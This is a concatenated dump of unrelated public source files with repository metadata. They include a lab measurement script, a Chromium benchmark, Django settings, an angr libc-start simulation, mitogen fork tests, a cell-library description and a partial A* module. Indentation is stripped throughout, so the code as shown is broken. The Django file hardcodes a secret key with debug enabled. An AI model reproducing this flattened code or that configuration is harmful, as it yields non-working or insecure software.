# print "Waiting for temperature to stabilize to %.0f mK..." % (stable_temp * 1E3)
while not_settled:
temperature = fridge.get_mc_temperature()
if temperature <= stable_temp:
not_settled = False
nwa.set_measure('S21')
set_voltages(0.00, 0.00, 0.00, 0.00, pinch=0.00)
unload()
load_electrons = True
power = -40
averages = 25
sweep_points = 801
nwa.set_trigger_source('BUS')
nwa.set_format('SLOG')
nwa_config = {'start' : 6.385E9,
'stop': 6.407E9,
'sweep_points': sweep_points,
'power': power,
'averages': averages,
'ifbw': nwa.get_ifbw()}
nwa.configure(**nwa_config)
nwa.set_electrical_delay(68E-9)
nwa.set_phase_offset(180.0)
dataCache.set_dict('nwa_config', nwa_config)
nwa.auto_scale()
Vresguards = list(np.arange(0.00, 0.15+0.025, +0.025))
Vtraps = list(np.arange(0.00, 0.25, 0.005)) \
+ list(np.arange(0.25, 0.00, -0.005))
Vress = 0.6 * np.ones(len(Vtraps))
fig = plt.figure(figsize=(8.,12.))
plt.subplot(311)
plt.plot(Vress, 'o', color="#23aaff", markeredgecolor="none", label="Resonator")
plt.plot(Vtraps, 'o', color="#f4b642", markeredgecolor="none", label='Trap')
plt.ylabel("Resonator voltage (V)")
plt.xlim(0, np.max([len(Vress), len(Vtraps)]))
plt.legend(loc=0, prop={'size' : 8})
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
plt.subplot(312)
current_vres, current_vtrap, current_vrg, current_vtg, pinch = get_voltages()
plt.text(np.min(fpts) + 0.10*(np.max(fpts)-np.min(fpts)),
np.min(mags) + 0.85*(np.max(mags) - np.min(mags)),
"res, trap, rg, tg = (%.2fV, %.2fV, %.2fV, %.2fV)" % (current_vres, current_vtrap, current_vrg, current_vtg))
plt.plot(fpts, mags)
plt.xlabel('Frequency (Hz)')
plt.ylabel('Magnitude (dB)')
plt.xlim(np.min(fpts), np.max(fpts))
plt.subplot(313)
plt.plot(fpts, phases)
plt.xlabel('Frequency (Hz)')
plt.ylabel('Phase (deg)')
plt.xlim(np.min(fpts), np.max(fpts))
fig.savefig(os.path.join(expt_path, "pre_electron_loading.png"), dpi=200)
plt.show()
nwa.set_format('MLOG')
nwa.auto_scale()
nwa.set_trigger_source('INT')
#unload_with_filament()
nwa.set_trigger_source('BUS')
nwa.set_format('SLOG')
nwa.set_average_state(True)
if load_electrons:
abs_deltaf = 1e9
Q = 0
# Set both the Q and deltaf threshold to something low if you want it to continue after the first load
while not (Q > 9000 and abs_deltaf > 6.5E6):
unload_with_filament()
load_resonator_not_trap()
set_voltages(0.6, -2.0, None, None)
sleep(1.0)
#set_voltages(Vress[0], Vtraps[0], None)
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
f0, Q = fit_res_gerwin(fpts, mags, span=3E6)
abs_deltaf = np.abs(f0-6.40511e9)
print "Fit result after loading: delta f = %.2f MHz and Q = %.0f" % (abs_deltaf/1E6, Q)
sleep(120)
nwa.set_center_frequency(f0+0.15E6)
nwa.set_span(3E6)
print "Set center frequency to %.6f GHz (shift = %.2f MHz)"%(f0/1E9, (f0-6.40511e9)/1E6)
dataCache.post('data_shape', [len(Vresguards), len(Vtraps)])
set_voltages(None, None, 0.00, 0.00)
print "Starting sweep..."
set_voltages(Vress[0], Vtraps[0], Vresguards[0], None, -1.00)
for Vrg in Vresguards:
set_voltages(None, None, Vrg, None)
for Vtrap in tqdm(Vtraps):
set_voltages(None, Vtrap, None, None)
take_trace_and_save(averages, do_fit=True)
# for Vrg in Vresguards:
# set_voltages(None, None, Vrg, None)
# for Vtrap in tqdm(Vtraps):
# set_voltages(None, Vtrap, None, None)
# take_trace_and_save(averages, do_fit=True)
nwa.set_format('MLOG')
nwa.auto_scale()
nwa.set_trigger_source('INT')
|
[
"yangge1987@gmail.com"
] |
yangge1987@gmail.com
|
d1ef46174618edcfd908c875a157a06da832d91a
|
602ea0c05970cbd766df068b003671c561f59661
|
/tools/perf/benchmarks/jetstream2.py
|
19f31f16c1bc952e688b1bb19284defef99e3e9d
|
[
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.0-or-later",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.0-only",
"APSL-2.0",
"LicenseRef-scancode-unknown",
"Zlib"
] |
permissive
|
VitalyKononenko/chromium
|
088de78a639375b073cabb7665afc638334e8672
|
b8ad2cadb6a163269cd7851bc7962744743785bd
|
refs/heads/master
| 2023-03-01T10:15:00.815394
| 2019-08-15T19:51:40
| 2019-08-15T19:51:40
| 202,603,102
| 1
| 0
|
BSD-3-Clause
| 2019-08-15T19:54:34
| 2019-08-15T19:54:33
| null |
UTF-8
|
Python
| false
| false
| 1,655
|
py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Apple's JetStream 2 benchmark.
JetStream 2 combines together a variety of JavaScript and Web Assembly
benchmarks, covering a variety of advanced workloads and programming
techniques, and reports a single score that balances them using a geometric
mean.
Each benchmark measures a distinct workload, and no single optimization
technique is sufficient to speed up all benchmarks. Some benchmarks
demonstrate tradeoffs, and aggressive or specialized optimizations for one
benchmark might make another benchmark slower. JetStream 2 rewards browsers
that start up quickly, execute code quickly, and continue running smoothly.
Each benchmark in JetStream 2 computes its own individual score. JetStream 2
weighs each benchmark equally, taking the geometric mean over each individual
benchmark's score to compute the overall JetStream 2 score.
"""
from telemetry import benchmark
import page_sets
from benchmarks import press
@benchmark.Info(emails=['hablich@chromium.org', 'tcwang@chromium.org'],
component='Blink>JavaScript',
documentation_url='https://browserbench.org/JetStream/in-depth.html')
class Jetstream2(press._PressBenchmark): # pylint: disable=protected-access
"""JetStream2, a combination of JavaScript and Web Assembly benchmarks.
Run all the Jetstream 2 benchmarks by default.
"""
@classmethod
def Name(cls):
return 'UNSCHEDULED_jetstream2'
def CreateStorySet(self, options):
return page_sets.Jetstream2StorySet()
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
1c412f4178575b10412fd80ba6e0c1dd27a43979
|
98cd4b641929e35cd3482b058e00ef7d0a151126
|
/Hafta3_Odev_2.py
|
f4a0709fe786e38511049dd3e91b7eff0e4fe905
|
[] |
no_license
|
organichacker/KOU_Python
|
60abaa9cf5eec1d0509d9d7113f152ee60e30cfa
|
d4534d94ef7a32c2e684f5baaac2a7ff30dee96b
|
refs/heads/main
| 2023-04-25T09:01:51.586110
| 2021-05-22T14:20:48
| 2021-05-22T14:20:48
| 365,274,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
import pandas as pd
Kaynak = pd.read_csv('C:\\Python\\Project\\Deneme\\top50.csv',usecols=['Unnamed: 0','Track.Name','Genre','Danceability'])
Kaynak_Genre = Kaynak['Genre'][:]
import matplotlib.pyplot as plt
y = Kaynak['Danceability'][:]
x = Kaynak['Unnamed: 0'][:]
plt.barh(x, y, height = 0.1)
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
4de20f0109cf70e5f728227b677b37923f8e3e0d
|
06fa929e73ba42d6f96605d8bbde674c5e2f0639
|
/01-open-read-pwd.py
|
29dde0d54f7a94764aeabe7a3dec677ebd979bbf
|
[] |
no_license
|
biagiola/python-file-manipulation
|
6b25e560a4373ff8e0fa136bb07cd70ee8329e1b
|
a29def48ee13353feab191f85faadac3736f6868
|
refs/heads/main
| 2022-12-22T01:14:48.738913
| 2020-10-02T15:50:11
| 2020-10-02T15:50:11
| 300,651,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
import os
g = open('data', 'rt')
f = open("data.txt", "r")
for x in f:
print(x)
print('Entire file: \n', g.read())
print(g.readlines())
print(os.system("pwd"))
|
[
"marcelobiagiola01@gmail.com"
] |
marcelobiagiola01@gmail.com
|
5457ca422d13650a936b6813af9e0f7264ec44b1
|
055ce5ca01b45127efee13b9a8fcfaa7fe4813e5
|
/oo/attributemethod/property.py
|
14f3e5d09ab40eb1ccd007adf34017141d7ae65f
|
[] |
no_license
|
PeihongKe/pythonRecipes
|
0afe96a05518e5445a3267be0c517bfc424b386f
|
d5d65628e3ffc6c9cdf8641932fa6bff407a92d0
|
refs/heads/master
| 2021-01-01T04:25:00.590994
| 2018-07-20T22:28:03
| 2018-07-20T22:28:03
| 97,172,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
py
|
import math
import util
# with property, it is safe to use public data attribute, as you can always add an abstraction on top of it whenever necesary
class Rectangle(object):
""" """
def __init__(self, width, height):
self.width = width
self.height = height
def get_area(self):
""" as it says """
return self.width * self.height
read_only_area = property(fget=get_area, doc='area of the rectangle ')
not_allowed_area = property(fget=None, fset=None, fdel=None, doc=None)
@property # the x property. the decorator creates a read-only property
def read_only_area_decorator(self):
""" readonly using decorator """
return self.width * self.height
@property
def read_write_area_decorator(self):
return self.width * self.height
@read_write_area_decorator.setter
def read_write_area_decorator(self, value):
scale = math.sqrt(value / self.read_write_area_decorator)
self.width *= scale
self.height *= scale
class TestProperty(util.TestCaseBase):
""" property(fget=None, fset=None, fdel=None, doc=None) """
def test_read_only_property(self):
""" read only """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area, 8)
def test_not_allowed_area(self):
""" disallowed property"""
r = Rectangle(2, 4)
with self.assertRaises(AttributeError) as err:
r.not_allowed_area
msg = str(err.exception)
self.assertEqual(msg, 'unreadable attribute')
def test_read_only_area_decorator(self):
""" read only using property """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area_decorator, 8)
def test_read_write_area_decorator(self):
""" read write using property """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area_decorator, 8)
r.read_write_area_decorator = 32
self.assertEqual(r.width, 4.0)
self.assertEqual(r.height, 8.0)
def test_property_inheritance(self):
""" """
class Base(object):
def f(self):
return 'base::f'
g = property(f)
class Derive(Base):
def f(self):
return 'drive::f'
d = Derive()
self.assertEqual(d.g, 'base::f')
|
[
"pkukph@hotmail.com"
] |
pkukph@hotmail.com
|
6b354ee59c681faf08710f4c4a73bf94b911ddca
|
33af6185b48bd76f97f0a74390a3a812ee216c78
|
/angr/angr/procedures/glibc/__libc_start_main.py
|
12aa852769b769b404e992c1b45228fc1eb2aa92
|
[
"BSD-2-Clause"
] |
permissive
|
Ruide/angr-dev
|
dab0cabd907fce47ac698f890c3f3a8b80ab7e2a
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
refs/heads/master
| 2022-11-10T11:27:13.355024
| 2017-10-07T14:29:09
| 2017-10-07T14:29:09
| 104,417,044
| 0
| 1
|
BSD-2-Clause
| 2022-10-16T04:48:10
| 2017-09-22T01:35:12
|
C
|
UTF-8
|
Python
| false
| false
| 8,177
|
py
|
import logging
import pyvex
import angr
l = logging.getLogger("angr.procedures.glibc.__libc_start_main")
######################################
# __libc_start_main
######################################
class __libc_start_main(angr.SimProcedure):
#pylint:disable=arguments-differ,unused-argument,attribute-defined-outside-init
ADDS_EXITS = True
NO_RET = True
IS_FUNCTION = True
local_vars = ('main', 'argc', 'argv', 'init', 'fini')
def _initialize_b_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_b_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
table = self.inline_call(malloc, 768).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.LOCALE_ARRAY):
# Each entry is 2 bytes
self.state.memory.store(table + (pos*2),
self.state.se.BVV(c, 16),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars
# 256 because 2 bytes each, -128 * 2
table += 256
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_b_loc_table_ptr = table_ptr
def _initialize_tolower_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_tolower_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
# 384 entries, 4 bytes each
table = self.inline_call(malloc, 384*4).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.TOLOWER_LOC_ARRAY):
self.state.memory.store(table + (pos * 4),
self.state.se.BVV(c, 32),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars: -128 index (4 bytes per index)
table += (128 * 4)
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_tolower_loc_table_ptr = table_ptr
def _initialize_toupper_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_toupper_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
# 384 entries, 4 bytes each
table = self.inline_call(malloc, 384*4).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.TOUPPER_LOC_ARRAY):
self.state.memory.store(table + (pos * 4),
self.state.se.BVV(c, 32),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars: -128 index (4 bytes per index)
table += (128 * 4)
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_toupper_loc_table_ptr = table_ptr
def _initialize_ctype_table(self):
self._initialize_b_loc_table()
self._initialize_tolower_loc_table()
self._initialize_toupper_loc_table()
@property
def envp(self):
return self.argv + (self.argc+1)*self.state.arch.bytes
def run(self, main, argc, argv, init, fini):
# TODO: handle symbolic and static modes
# TODO: add argument types
self._initialize_ctype_table()
self.main, self.argc, self.argv, self.init, self.fini = self._extract_args(self.state, main, argc, argv, init,
fini)
# TODO: __cxa_atexit calls for various at-exit needs
self.call(self.init, (self.argc, self.argv, self.envp), 'after_init')
def after_init(self, main, argc, argv, init, fini, exit_addr=0):
if isinstance(self.state.arch, ArchAMD64):
# (rsp+8) must be aligned to 16 as required by System V ABI
# ref: http://www.x86-64.org/documentation/abi.pdf , page 16
self.state.regs.rsp = (self.state.regs.rsp & 0xfffffffffffffff0) - 8
self.call(self.main, (self.argc, self.argv, self.envp), 'after_main')
def after_main(self, main, argc, argv, init, fini, exit_addr=0):
self.exit(0)
def static_exits(self, blocks):
# Execute those blocks with a blank state, and then dump the arguments
blank_state = angr.SimState(project=self.project, mode="fastpath")
# set up the stack pointer
blank_state.regs.sp = 0x7fffffff
# Execute each block
state = blank_state
for b in blocks:
# state.regs.ip = next(iter(stmt for stmt in b.statements if isinstance(stmt, pyvex.IRStmt.IMark))).addr
irsb = angr.SimEngineVEX().process(state, b,
force_addr=next(iter(stmt for stmt in b.statements if isinstance(stmt, pyvex.IRStmt.IMark))).addr)
if irsb.successors:
state = irsb.successors[0]
else:
break
cc = angr.DEFAULT_CC[self.arch.name](self.arch)
args = [ cc.arg(state, _) for _ in xrange(5) ]
main, _, _, init, fini = self._extract_args(blank_state, *args)
all_exits = [
(init, 'Ijk_Call'),
(main, 'Ijk_Call'),
(fini, 'Ijk_Call'),
]
return all_exits
@staticmethod
def _extract_args(state, main, argc, argv, init, fini):
"""
Extract arguments and set them to
:param angr.sim_state.SimState state: The program state.
:param main: An argument to __libc_start_main.
:param argc: An argument to __libc_start_main.
:param argv: An argument to __libc_start_main.
:param init: An argument to __libc_start_main.
:param fini: An argument to __libc_start_main.
:return: A tuple of five elements: (main, argc, argv, init, fini)
:rtype: tuple
"""
main_ = main
argc_ = argc
argv_ = argv
init_ = init
fini_ = fini
if state.arch.name == "PPC32":
# for some dumb reason, PPC passes arguments to libc_start_main in some completely absurd way
argv_ = argc_
argc_ = main_
main_ = state.mem[state.regs.r8 + 4:].int.resolved
init_ = state.mem[state.regs.r8 + 8:].int.resolved
fini_ = state.mem[state.regs.r8 + 12:].int.resolved
elif state.arch.name == "PPC64":
main_ = state.mem[state.regs.r8 + 8:].long.resolved
init_ = state.mem[state.regs.r8 + 16:].long.resolved
fini_ = state.mem[state.regs.r8 + 24:].long.resolved
return main_, argc_, argv_, init_, fini_
from archinfo import ArchAMD64
|
[
"rd.cheung.bupt.sms@gmail.com"
] |
rd.cheung.bupt.sms@gmail.com
|
093e8e15f82513ecd3e94e0d7205c22368aed6b9
|
198b3dc76290ab6b76713db849495ec4102e8ece
|
/Step-3/step3.py
|
f303d64cb0d7e72f8d1480df33d6446107595e36
|
[] |
no_license
|
PabloRdrRbl/my-12-steps-navier-stokes
|
efa40426b2fbc86fd4f34ee50ccddd18dece3942
|
f38135bb5fa1955d12008abd2076df2cbc567301
|
refs/heads/master
| 2021-01-20T20:15:18.994548
| 2016-07-11T23:15:56
| 2016-07-11T23:15:56
| 62,781,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import numpy as np
import matplotlib.pyplot as plt
def linearconv(nx):
dx = 2 / (nx - 1) # Spatial domain has 2 units length
nt = 25 # Number of time steps
sigma = 0.2
nu = 0.3 # Viscosity
# Courant number, CFL condition
# CFL < 1
dt = sigma * dx**2 / nu
# Initial conditions
u = np.ones(nx)
u[0.5 / dx: 1 / dx + 1] = 2 # u = 2 between 0.5 and 1
# Printing u
plt.plot(np.linspace(0, 2, nx), u)
un = np.ones(nx) # Initialize a temporary array
# Solution
for n in range(nt):
un = u.copy()
for i in range(1, nx - 1):
u[i] = (un[i] + nu * dt / dx**2 *
(un[i + 1] - 2 * un[i] + un[i - 1]))
# Printing the new u
plt.plot(np.linspace(0, 2, nx), u)
plt.title('Using $nx = %d$ and $\sigma = %1.1f$' % (nx, sigma))
plt.savefig('image_output/u_profile_sigma_%d_nx_%d.png' % (sigma * 10, nx))
# plt.show()
# Cleaning the figure
# [http://stackoverflow.com/questions/8213522/matplotlib-
# clearing-a-plot-when-to-use-cla-clf-or-close]
plt.clf()
if __name__ == '__main__':
linearconv(41)
|
[
"prodrr05@estudiantes.unileon.es"
] |
prodrr05@estudiantes.unileon.es
|
26430b17c1584bfa3251927a4d94dab96ff51f73
|
fc9f2add016408d650ef273d9fe113f96dda4f06
|
/sum.py
|
8fc0c4bfeb5b9eb965672ce157f566269ad13818
|
[] |
no_license
|
takatsugu21/gitTest
|
a973e99686b099652a32d54dda1c6c50e50bf071
|
9ecf525c982a55755547e01fc108c599f1e933c7
|
refs/heads/develop
| 2023-05-04T19:20:00.700738
| 2023-04-27T09:37:09
| 2023-04-27T09:37:09
| 339,895,009
| 0
| 0
| null | 2023-04-27T09:37:58
| 2021-02-18T00:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 35
|
py
|
answer: int = 1 + 2
print(answer)
|
[
"takyama@nttpc.co.jp"
] |
takyama@nttpc.co.jp
|
b3bcc9971980112e5416187d1d42f22e61ee3885
|
ce93b078ac34a797e3950077fd0c226519e9930e
|
/venv/Scripts/easy_install-3.7-script.py
|
6c9212e7e98fe7d0a32ec9db20e22a05c23e1016
|
[] |
no_license
|
chetanpant11/HackerRankCompetitiveProgramming
|
9b8890a6ced45da700c2ba0586b208b8fef574db
|
0596d4a29a3abb9e5bc922d05e60c231fc50a46a
|
refs/heads/master
| 2020-06-12T22:11:18.447900
| 2020-06-02T14:09:12
| 2020-06-02T14:09:12
| 194,443,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
#!"C:\Users\CHETAN PANT\PycharmProjects\Hackerrank\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"chetanpant87@gmail.com"
] |
chetanpant87@gmail.com
|
021e4fcee7a62e92f84e0a057de120f6f6d67961
|
6c8f3ab5f952d986a17edda582c5a039bf65c632
|
/django/consolidate_project/consolidate_project/settings.py
|
08a82252a1c6016afd3b14e4b91661d7bd5f4c59
|
[] |
no_license
|
phillipn/coding_bootcamp_projects
|
3d3bd697728dd4502267e0cd2be7a090952029a8
|
278f96df9d256364583654a00fe585d474ea86a1
|
refs/heads/master
| 2021-01-17T17:30:14.607944
| 2017-03-19T18:12:32
| 2017-03-19T18:12:32
| 82,971,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,218
|
py
|
"""
Django settings for consolidate_project project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tqgt7)2b(iphav%!(5-e1(6kk%x=*o^#&i_aa_ab55)t0xgj5_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.login',
'apps.registration',
'apps.turtles',
'apps.classes',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'consolidate_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'consolidate_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"phillipn101@gmail.com"
] |
phillipn101@gmail.com
|
580f96d5338bff027bec064c4f87a82504567a6d
|
9cd9e89359f0da1750a19f0609619e3bbe4c536e
|
/tests/fork_test.py
|
61c0e16d67a73a9a7ee9b0fcc4c582058fe208d0
|
[
"BSD-3-Clause"
] |
permissive
|
ph448/mitogen
|
e961c95578c852908e33861da7226919547070f0
|
c24d29d3676aa122e25716450246306aaf4a797b
|
refs/heads/master
| 2020-03-19T01:48:11.362786
| 2018-05-28T05:00:57
| 2018-05-28T05:00:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,219
|
py
|
import ctypes
import os
import random
import ssl
import struct
import sys
import mitogen
import unittest2
import testlib
import plain_old_module
IS_64BIT = struct.calcsize('P') == 8
PLATFORM_TO_PATH = {
('darwin', False): '/usr/lib/libssl.dylib',
('darwin', True): '/usr/lib/libssl.dylib',
('linux2', False): '/usr/lib/libssl.so',
('linux2', True): '/usr/lib/x86_64-linux-gnu/libssl.so',
}
c_ssl = ctypes.CDLL(PLATFORM_TO_PATH[sys.platform, IS_64BIT])
c_ssl.RAND_pseudo_bytes.argtypes = [ctypes.c_char_p, ctypes.c_int]
c_ssl.RAND_pseudo_bytes.restype = ctypes.c_int
def ping():
return 123
def random_random():
return random.random()
def RAND_pseudo_bytes(n=32):
buf = ctypes.create_string_buffer(n)
assert 1 == c_ssl.RAND_pseudo_bytes(buf, n)
return buf[:]
def exercise_importer(n):
"""
Ensure the forked child has a sensible importer.
"""
sys.path.remove(testlib.DATA_DIR)
import simple_pkg.a
return simple_pkg.a.subtract_one_add_two(n)
class ForkTest(testlib.RouterMixin, unittest2.TestCase):
def test_okay(self):
context = self.router.fork()
self.assertNotEqual(context.call(os.getpid), os.getpid())
self.assertEqual(context.call(os.getppid), os.getpid())
def test_random_module_diverges(self):
context = self.router.fork()
self.assertNotEqual(context.call(random_random), random_random())
def test_ssl_module_diverges(self):
# Ensure generator state is initialized.
RAND_pseudo_bytes()
context = self.router.fork()
self.assertNotEqual(context.call(RAND_pseudo_bytes),
RAND_pseudo_bytes())
def test_importer(self):
context = self.router.fork()
self.assertEqual(2, context.call(exercise_importer, 1))
def test_on_start(self):
recv = mitogen.core.Receiver(self.router)
def on_start(econtext):
sender = mitogen.core.Sender(econtext.parent, recv.handle)
sender.send(123)
context = self.router.fork(on_start=on_start)
self.assertEquals(123, recv.get().unpickle())
class DoubleChildTest(testlib.RouterMixin, unittest2.TestCase):
def test_okay(self):
# When forking from the master process, Mitogen had nothing to do with
# setting up stdio -- that was inherited wherever the Master is running
# (supervisor, iTerm, etc). When forking from a Mitogen child context
# however, Mitogen owns all of fd 0, 1, and 2, and during the fork
# procedure, it deletes all of these descriptors. That leaves the
# process in a weird state that must be handled by some combination of
# fork.py and ExternalContext.main().
# Below we simply test whether ExternalContext.main() managed to boot
# successfully. In future, we need lots more tests.
c1 = self.router.fork()
c2 = self.router.fork(via=c1)
self.assertEquals(123, c2.call(ping))
def test_importer(self):
c1 = self.router.fork(name='c1')
c2 = self.router.fork(name='c2', via=c1)
self.assertEqual(2, c2.call(exercise_importer, 1))
if __name__ == '__main__':
unittest2.main()
|
[
"dw@botanicus.net"
] |
dw@botanicus.net
|
b001592fbd0025106b5c0de3a8e0852a6fb0006e
|
226b1c73a706f4734834196d18305d4d2c873589
|
/synlib/descriptions/EDFFXL.py
|
206bab5d4710ad637b02fca8e34e937d415a73fb
|
[] |
no_license
|
ocakgun/vlsistuff
|
43b4b07ae186b8d2360d11c57cd10b861e96bcbe
|
776c07f5d0c40fe7d410b5c85e7381017d4dab64
|
refs/heads/master
| 2022-06-13T14:40:22.641310
| 2020-05-08T11:09:00
| 2020-05-08T11:09:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
Desc = cellDescClass("EDFFXL")
Desc.properties["cell_leakage_power"] = "1762.140420"
Desc.properties["cell_footprint"] = "edff"
Desc.properties["area"] = "76.507200"
Desc.pinOrder = ['CK', 'D', 'E', 'IQ', 'IQN', 'Q', 'QN', 'next']
Desc.add_arc("CK","D","setup_rising")
Desc.add_arc("CK","D","hold_rising")
Desc.add_arc("CK","E","setup_rising")
Desc.add_arc("CK","E","hold_rising")
Desc.add_arc("CK","Q","rising_edge")
Desc.add_arc("CK","QN","rising_edge")
Desc.add_param("area",76.507200);
Desc.set_pin_job("CK","clock")
Desc.add_pin("CK","input")
Desc.add_pin("E","input")
Desc.add_pin("D","input")
Desc.add_pin("IQ","output")
Desc.add_pin_func("IQ","unknown")
Desc.add_pin("next","output")
Desc.add_pin_func("next","unknown")
Desc.add_pin("Q","output")
Desc.add_pin_func("Q","unknown")
Desc.add_pin("IQN","output")
Desc.add_pin_func("IQN","unknown")
Desc.add_pin("QN","output")
Desc.add_pin_func("QN","unknown")
Desc.set_job("flipflop")
CellLib["EDFFXL"]=Desc
|
[
"greenblat@mac.com"
] |
greenblat@mac.com
|
37913d32b1f43d61aebe7d69c85c3aed7ea2fbc1
|
baea358f397970314b60b2e3420e9925c241b335
|
/hlt/a_star.py
|
c1d33dba5dd5801078f9069a3c7e90f5913558c5
|
[] |
no_license
|
adozendonuts/hb1
|
2ea366941f3e4f3f5434eeca9da3583ec7ad23a7
|
fbaf95b98e832ff75ed97f80596b7b5f135a53bd
|
refs/heads/master
| 2021-07-22T00:00:28.037915
| 2017-11-01T07:15:23
| 2017-11-01T07:15:23
| 109,086,987
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,780
|
py
|
"""
A* Pathfinding on an exhaustive rectangular grid
TODO: change map representation to planets + in-between points for long distances, 20 unit radius for each ship
"""
import collections
import heapq
class Queue:
"""
A data structure used by the algorithm to determine which order to process the locations
"""
def __init__(self):
self.elements = collections.deque()
def empty(self):
return len(self.elements) == 0
def put(self, x):
self.elements.append(x)
def get(self):
return self.elements.popleft()
class SimpleGraph:
"""
A data structure that identifies the neighbors for each location
"""
def __init__(self):
self.edges = {}
def neighbors(self, id):
return self.edges[id]
class SquareGrid:
"""
A data structure that defines a square (rectangular) grid as a series of locations
"""
def __init__(self, width, height):
self.width = width
self.height = height
self.walls = []
def in_bounds(self, id):
(x, y) = id
return 0 <= x < self.width and 0 <= y < self.height
def passable(self, id):
return id not in self.walls
def neightbors(self, id):
